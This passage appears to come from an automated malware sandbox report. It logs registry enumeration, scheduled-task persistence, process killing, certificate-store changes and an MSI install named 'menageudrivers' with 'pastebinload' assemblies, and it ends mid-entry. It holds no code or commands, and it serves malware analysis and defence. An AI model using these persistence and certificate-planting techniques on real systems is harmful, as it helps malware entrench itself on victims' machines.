Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4790483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 4790483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 4790483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 4790483.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3308 schtasks.exe 5708 schtasks.exe 1520 schtasks.exe 2624 schtasks.exe 6804 schtasks.exe 5928 schtasks.exe 5976 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2512 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeCleaner.exe4790483.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeCleaner.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exemshta.exepowershell.exeWerFault.execonhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Cleaner.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 4790483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 4790483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1680 taskkill.exe 6920 taskkill.exe 5180 taskkill.exe 4872 taskkill.exe 1948 taskkill.exe 3424 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
sihclient.exeDrvInst.exemask_svc.exemsiexec.exeCleanpro12.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections Cleanpro12.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe -
Modifies registry class 43 IoCs
Processes:
Cleaner.exemsiexec.exeSetup.exegdgame.exeCleaner.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" Cleaner.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|l.exe msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|o.exe msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|f.exe msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\ProductIcon = "C:\\Windows\\Installer\\{3D02CD4C-367D-48D1-87A3-16384FD92B0A}\\ARPPRODUCTICON.exe" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ gdgame.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} Cleaner.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\ProductName = "menageudrivers" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|o.exe\pastebinload,Version="0.0.0.0",Culture="neutral",FileVersion="0.0.0.0",ProcessorArchitecture="MSIL" = 2700740068005b0037004b00450040004a003f004c0040003f00250036002c006d0072003d0026003e006a0024002900670038007300470036002e0039007b006c004c004c0027002900470037003800750000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Downloaded Installations\\{4175BAA6-49B9-43E5-8B49-E892979E209E}\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\Media\1 = "DISK1;1" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Downloaded Installations\\{4175BAA6-49B9-43E5-8B49-E892979E209E}\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{71EAA356-BF3A-47E8-BFA0-C862453809B3} Cleaner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\PackageCode = "6AAB57149B945E34B8948E2979E902E9" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\42DD69C35C593EC48AE261C21529FBB0\C4DC20D3D7631D84783A6183F49DB2A0 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 Cleaner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C4DC20D3D7631D84783A6183F49DB2A0\AlwaysInstall msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\42DD69C35C593EC48AE261C21529FBB0 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Cleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|l.exe\pastebinload,Version="0.0.0.0",Culture="neutral",FileVersion="0.0.0.0",ProcessorArchitecture="MSIL" = 2700740068005b0037004b00450040004a003f004c0040003f00250036002c006d0072003d0026003e0042007300210072002100700078003400730038002e006b005500680030004c006e0030003300390000000000 msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Program Files (x86)|pupsik|My Product Name|f.exe\pastebinload,Version="0.0.0.0",Culture="neutral",FileVersion="0.0.0.0",ProcessorArchitecture="MSIL" = 2700740068005b0037004b00450040004a003f004c0040003f00250036002c006d0072003d0026003e00250071006b0030004c00690061002900710039005b005a00590024006d007200640046005f00250000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface Cleaner.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C4DC20D3D7631D84783A6183F49DB2A0 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\Version = "16777216" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C4DC20D3D7631D84783A6183F49DB2A0\SourceList\PackageName = "menageudrivers.msi" msiexec.exe -
Processes:
tapinstall.exeCleaner_Installation.exeinstaller.exeCleaner.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 